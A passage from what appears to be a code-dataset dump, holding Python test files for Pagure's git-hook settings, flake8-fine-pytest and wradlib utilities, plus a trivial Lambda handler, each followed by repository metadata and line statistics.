)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git "
"push - test - Pagure</title>",
output_text,
)
self.assertIn(
'<input class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
data = {}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git push "
"- test - Pagure</title>",
output_text,
)
self.assertIn(
'<input class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
def test_plugin_pagure_ticket_deactivate(self):
""" Test the pagure_ticket plugin on/off endpoint. """
user = tests.FakeUser(username="pingou")
with tests.user_set(self.app.application, user):
data = {"csrf_token": self.csrf_token}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
'<h5 class="pl-2 font-weight-bold text-muted">'
"Project Settings</h5>\n",
output_text,
)
self.assertIn(
"Hook Prevent creating new branches by git push deactivated",
output_text,
)
output = self.app.get(
"/test/settings/Prevent creating new branches by git push"
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git push "
"- test - Pagure</title>",
output_text,
)
self.assertIn(
'<input class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
self.assertFalse(
os.path.exists(
os.path.join(
self.path,
"repos",
"test.git",
"hooks",
"post-receive.pagure",
)
)
)
def test_plugin_pagure_ticket_activate(self):
""" Test the pagure_ticket plugin on/off endpoint. """
user = tests.FakeUser(username="pingou")
with tests.user_set(self.app.application, user):
# Activate hook
data = {"csrf_token": self.csrf_token, "active": "y"}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
'<h5 class="pl-2 font-weight-bold text-muted">'
"Project Settings</h5>\n",
output_text,
)
self.assertIn(
"Hook Prevent creating new branches by git push activated",
output_text,
)
output = self.app.get(
"/test/settings/Prevent creating new branches by git push"
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git push "
"- test - Pagure</title>",
output_text,
)
self.assertIn(
'<input checked class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
# De-Activate hook
data = {"csrf_token": self.csrf_token}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
'<h5 class="pl-2 font-weight-bold text-muted">'
"Project Settings</h5>\n",
output_text,
)
self.assertIn(
"Hook Prevent creating new branches by git push deactivated",
output_text,
)
output = self.app.get(
"/test/settings/Prevent creating new branches by git push"
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git push "
"- test - Pagure</title>",
output_text,
)
self.assertIn(
'<input class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
self.assertFalse(
os.path.exists(
os.path.join(
self.path,
"repos",
"test.git",
"hooks",
"pre-receive.pagure_no_new_branches",
)
)
)
def test_plugin_pagure_ticket_activate_w_no_repo(self):
""" Test the pagure_ticket plugin on/off endpoint. """
shutil.rmtree(os.path.join(self.path, "repos", "test.git"))
user = tests.FakeUser(username="pingou")
with tests.user_set(self.app.application, user):
# Try re-activate hook w/o the git repo
data = {"csrf_token": self.csrf_token, "active": "y"}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
)
self.assertEqual(output.status_code, 404)
if __name__ == "__main__":
unittest.main(verbosity=2)
| 34.67364 | 89 | 0.520574 | 853 | 8,287 | 4.917937 | 0.161782 | 0.057211 | 0.072944 | 0.105364 | 0.821454 | 0.809535 | 0.782837 | 0.774732 | 0.761859 | 0.751847 | 0 | 0.010054 | 0.37589 | 8,287 | 238 | 90 | 34.819328 | 0.801044 | 0.057319 | 0 | 0.661376 | 0 | 0.026455 | 0.250999 | 0.044711 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.026455 | false | 0 | 0.037037 | 0 | 0.068783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
43834bd884389f915826d3e274660ff0074add70 | 340 | py | Python | tests/test_integration/test_xfail_reason.py | lowitea/flake8-fine-pytest | 5f5b6a98abbc98e5a74c4ac8bd03890332828070 | [
"MIT"
] | null | null | null | tests/test_integration/test_xfail_reason.py | lowitea/flake8-fine-pytest | 5f5b6a98abbc98e5a74c4ac8bd03890332828070 | [
"MIT"
] | null | null | null | tests/test_integration/test_xfail_reason.py | lowitea/flake8-fine-pytest | 5f5b6a98abbc98e5a74c4ac8bd03890332828070 | [
"MIT"
] | null | null | null | def test_xfail_with_no_reason(run_validator_for_test_files):
errors = run_validator_for_test_files('xfailed_test_with_no_reason.py')
assert len(errors) == 1
def test_xfail_with_empty_reason(run_validator_for_test_files):
errors = run_validator_for_test_files('xfailed_test_with_empty_reason.py')
assert len(errors) == 1
| 30.909091 | 78 | 0.811765 | 54 | 340 | 4.518519 | 0.314815 | 0.196721 | 0.245902 | 0.311475 | 0.811475 | 0.811475 | 0.614754 | 0.614754 | 0.614754 | 0.614754 | 0 | 0.006623 | 0.111765 | 340 | 10 | 79 | 34 | 0.801325 | 0 | 0 | 0.333333 | 0 | 0 | 0.185294 | 0.185294 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
438e6b747b70cef1378c3dd7aed9fc55a98a296b | 14,801 | py | Python | wradlib/tests/test_util.py | egouden/wradlib | daac35ff24c774183ca0fa63f28a85fb1e4c84f2 | [
"MIT"
] | 1 | 2020-11-16T14:24:15.000Z | 2020-11-16T14:24:15.000Z | wradlib/tests/test_util.py | egouden/wradlib | daac35ff24c774183ca0fa63f28a85fb1e4c84f2 | [
"MIT"
] | null | null | null | wradlib/tests/test_util.py | egouden/wradlib | daac35ff24c774183ca0fa63f28a85fb1e4c84f2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2011-2020, wradlib developers.
# Distributed under the MIT License. See LICENSE.txt for more info.
import datetime as dt
import os
import deprecation
import numpy as np
import pytest
from wradlib import util
from . import requires_data
class TestHelperFunctions:
def test__shape_to_size(self):
assert util._shape_to_size((10, 10, 10)) == 10 * 10 * 10
def test__idvalid(self):
data = np.array(
[np.inf, np.nan, -99.0, 99, -9999.0, -9999, -10.0, -5.0, 0.0, 5.0, 10.0]
)
assert np.allclose(util._idvalid(data), np.array([6, 7, 8, 9, 10]))
assert np.allclose(
util._idvalid(data, minval=-5.0, maxval=5.0), np.array([7, 8, 9])
)
assert np.allclose(
util._idvalid(data, isinvalid=[-9999], maxval=5.0),
np.array([2, 6, 7, 8, 9]),
)
def test_issequence(self):
assert util.issequence([0, 1, 2])
assert not util.issequence(1)
assert not util.issequence("str")
def test_trapezoid(self):
data = np.arange(0.0, 30.1, 0.1)
correct = np.arange(0.0, 1.0, 0.01)
correct = np.concatenate((correct, np.ones(101), correct[::-1]))
result = util.trapezoid(data, 0.0, 10.0, 20.0, 30.0)
np.testing.assert_array_almost_equal(result, correct, decimal=9)
def test_prob_round(self):
np.random.seed(42)
np.testing.assert_equal(42.0, util.prob_round(42.4242))
np.random.seed(44)
np.testing.assert_equal(43.0, util.prob_round(42.4242))
def test_get_wradlib_data_path(self):
wrl_data_path = os.environ.get("WRADLIB_DATA", None)
del os.environ["WRADLIB_DATA"]
with pytest.raises(EnvironmentError):
util.get_wradlib_data_path()
if wrl_data_path is not None:
os.environ["WRADLIB_DATA"] = wrl_data_path
@requires_data
def test_get_wradlib_data_path_requires(self):
filename = os.path.join(util.get_wradlib_data_path(), "test.dat")
with pytest.raises(EnvironmentError):
util.get_wradlib_data_file(filename)
def test_from_to(self):
out = util.from_to("2000-01-01 00:00:00", "2000-01-02 00:00:00", 86400)
shouldbe = [dt.datetime(2000, 1, 1, 0, 0), dt.datetime(2000, 1, 2, 0, 0)]
assert out == shouldbe
def test_calculate_polynomial(self):
data = np.arange(0, 10, 1)
w = np.arange(0, 5, 1)
out = np.array([0, 10, 98, 426, 1252, 2930, 5910, 10738, 18056, 28602])
poly = util.calculate_polynomial(data, w)
np.testing.assert_allclose(poly, out, rtol=1e-12)
def test_import_optional(self):
m = util.import_optional("math")
np.testing.assert_equal(m.log10(100), 2.0)
mod = util.import_optional("h8x")
with pytest.raises(AttributeError):
mod.test()
@requires_data
@deprecation.fail_if_not_removed
def test_maximum_intensity_projection(self):
angle = 0.0
elev = 0.0
filename = util.get_wradlib_data_file("misc/polar_dBZ_tur.gz")
data = np.loadtxt(filename)
# we need to have meter here for the georef function inside mip
d1 = np.arange(data.shape[1], dtype=np.float) * 1000
d2 = np.arange(data.shape[0], dtype=np.float)
data = np.roll(data, (d2 >= angle).nonzero()[0][0], axis=0)
# calculate max intensity proj
util.maximum_intensity_projection(data, r=d1, az=d2, angle=angle, elev=elev)
util.maximum_intensity_projection(data, autoext=False)
@requires_data
def test_roll2d_polar(self):
filename = util.get_wradlib_data_file("misc/polar_dBZ_tur.gz")
data = np.loadtxt(filename)
result1 = util.roll2d_polar(data, 1, axis=0)
result2 = util.roll2d_polar(data, -1, axis=0)
result3 = util.roll2d_polar(data, 1, axis=1)
result4 = util.roll2d_polar(data, -1, axis=1)
np.testing.assert_equal(result1, np.roll(data, 1, axis=0))
np.testing.assert_equal(result2, np.roll(data, -1, axis=0))
np.testing.assert_equal(result3[:, 1:], np.roll(data, 1, axis=1)[:, 1:])
np.testing.assert_equal(result4[:, :-1], np.roll(data, -1, axis=1)[:, :-1])
def test_medfilt_along_axis(self):
x = np.arange(10).reshape((2, 5)).astype("f4")
shouldbe = np.array([[0.0, 1.0, 2.0, 3.0, 3.0], [5.0, 6.0, 7.0, 8.0, 8.0]])
result = util.medfilt_along_axis(x, 3)
np.testing.assert_allclose(result, shouldbe)
def test_gradient_along_axis(self):
x = np.arange(10).reshape((2, 5)).astype("f4") ** 2
result = util.gradient_along_axis(x)
shouldbe = np.array([[1.0, 2.0, 4.0, 6.0, 7.0], [11.0, 12.0, 14.0, 16.0, 17.0]])
np.testing.assert_allclose(result, shouldbe)
def test_gradient_from_smoothed(self):
x = np.arange(10).reshape((2, 5)).astype("f4") ** 2
result = util.gradient_from_smoothed(x)
shouldbe = np.array([[1.0, 2.0, 1.5, 0.0, 0.0], [11.0, 12.0, 6.5, 0.0, 0.0]])
np.testing.assert_allclose(result, shouldbe)
class TestUtil:
img = np.zeros((36, 10), dtype=np.float64)
img[2, 2] = 1 # isolated pixel
img[5, 6:8] = 1 # line
img[20, :] = 1 # spike
img[9:12, 4:7] = 1 # precip field
# img[15:17,5:7] = np.nan # nodata as nans
def test_filter_window_polar(self):
np.random.seed(42)
rscale = 250
# nrays, nbins = self.img.shape
# ascale = 2 * np.pi / self.img.shape[0]
mean = util.filter_window_polar(self.img.copy(), 300, "maximum", rscale)
mean2 = util.filter_window_polar(
self.img.copy(), 300, "maximum", rscale, random=True
)
correct = np.array(
[
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[1.0, 1.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
)
correct2 = np.array(
[
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
)
np.testing.assert_array_equal(mean, correct)
np.testing.assert_array_equal(mean2, correct2)
def test_half_power_radius(self):
hpr = util.half_power_radius(np.arange(0, 100000, 10000), 1.0)
res = np.array(
[
0.0,
87.266,
174.533,
261.799,
349.066,
436.332,
523.599,
610.865,
698.132,
785.398,
]
)
assert np.allclose(hpr, res)
def test_filter_window_cartesian(self):
correct = np.array(
[
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
)
assert np.allclose(
util.filter_window_cartesian(
self.img, 500.0, "maximum", np.array([250.0, 250])
),
correct,
)
class TestFindBboxIndices:
xarr = np.linspace(500, 1000, num=6)
yarr = np.linspace(550, 950, num=9)
gridx, gridy = np.meshgrid(xarr, yarr)
grid = np.dstack((gridx, gridy))
outside = [400, 400, 1100, 1100]
inside1 = [599, 599, 901, 901]
inside2 = [601, 601, 899, 899]
def test_find_bbox_indices(self):
bbind = util.find_bbox_indices(self.grid, self.outside)
assert np.array_equal(bbind, [0, 0, self.grid.shape[1], self.grid.shape[0]])
bbind = util.find_bbox_indices(self.grid, self.inside1)
assert np.array_equal(bbind, [0, 0, 5, 8])
bbind = util.find_bbox_indices(self.grid, self.inside2)
assert np.array_equal(bbind, [1, 1, 4, 7])
| 45.823529 | 88 | 0.441794 | 3,244 | 14,801 | 1.970407 | 0.081381 | 0.484981 | 0.673967 | 0.836671 | 0.598091 | 0.534887 | 0.504537 | 0.472153 | 0.427722 | 0.411452 | 0 | 0.272454 | 0.325991 | 14,801 | 322 | 89 | 45.965839 | 0.368284 | 0.024998 | 0 | 0.460432 | 0 | 0 | 0.011167 | 0.002913 | 0 | 0 | 0 | 0 | 0.097122 | 1 | 0.068345 | false | 0 | 0.035971 | 0 | 0.140288 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
43b1311f88ffb04ebaa22b5e0c460ddcc7b7ca51 | 177 | py | Python | Module 2 Task/Ansible-Lambda-Python/LambdaMain.py | jpeezy-undaunted/cil-internship-cohort-02 | ecdd885f61714767ef95f772258432c7bfb3a9fb | [
"MIT"
] | null | null | null | Module 2 Task/Ansible-Lambda-Python/LambdaMain.py | jpeezy-undaunted/cil-internship-cohort-02 | ecdd885f61714767ef95f772258432c7bfb3a9fb | [
"MIT"
] | null | null | null | Module 2 Task/Ansible-Lambda-Python/LambdaMain.py | jpeezy-undaunted/cil-internship-cohort-02 | ecdd885f61714767ef95f772258432c7bfb3a9fb | [
"MIT"
] | null | null | null | # -*- encoding:utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
def lambda_handler(event, context):
print("Hello Paul Welcome") | 29.5 | 82 | 0.762712 | 22 | 177 | 5.772727 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 0.124294 | 177 | 6 | 83 | 29.5 | 0.812903 | 0.124294 | 0 | 0 | 0 | 0 | 0.116883 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
603c52918fdcc30d4417398055d173d5a3f17592 | 38 | py | Python | models/unet/__init__.py | tbuikr/fastMRI | 4395380bbcddefe0bcfea76a2790e0d978009dea | [
"MIT"
] | 2 | 2019-12-09T04:57:57.000Z | 2020-02-24T18:04:12.000Z | models/unet/__init__.py | tbuikr/fastMRI | 4395380bbcddefe0bcfea76a2790e0d978009dea | [
"MIT"
] | null | null | null | models/unet/__init__.py | tbuikr/fastMRI | 4395380bbcddefe0bcfea76a2790e0d978009dea | [
"MIT"
] | null | null | null | from .unet_transpose import define_Gen | 38 | 38 | 0.894737 | 6 | 38 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 38 | 1 | 38 | 38 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
604d655dfe6753a15cc1d7368b32b44efa545046 | 98 | py | Python | finrl_meta/env_execution_optimizing/order_execution_qlib/trade/reward/__init__.py | eitin-infant/FinRL-Meta | 4c94011e58425796e7e2e5c1bf848afd65c828d6 | [
"MIT"
] | 214 | 2021-11-08T17:06:11.000Z | 2022-03-31T18:29:48.000Z | finrl_meta/env_execution_optimizing/order_execution_qlib/trade/reward/__init__.py | eitin-infant/FinRL-Meta | 4c94011e58425796e7e2e5c1bf848afd65c828d6 | [
"MIT"
] | 51 | 2021-11-14T19:11:02.000Z | 2022-03-30T20:23:08.000Z | finrl_meta/env_execution_optimizing/order_execution_qlib/trade/reward/__init__.py | eitin-infant/FinRL-Meta | 4c94011e58425796e7e2e5c1bf848afd65c828d6 | [
"MIT"
] | 110 | 2021-11-03T07:41:40.000Z | 2022-03-31T03:23:38.000Z | from .base import *
from .pa_penalty import *
from .ppo_reward import *
from .vp_penalty import *
| 19.6 | 25 | 0.755102 | 15 | 98 | 4.733333 | 0.533333 | 0.422535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163265 | 98 | 4 | 26 | 24.5 | 0.865854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6058dc71528f9a2f33a15e425191af8a7ab7925e | 211 | py | Python | facebook_events_scraper/__init__.py | munyoudoum/facebook-events-scraper | b51c6f316fcf11d56c9869895e0e4db9e2b8234d | [
"MIT"
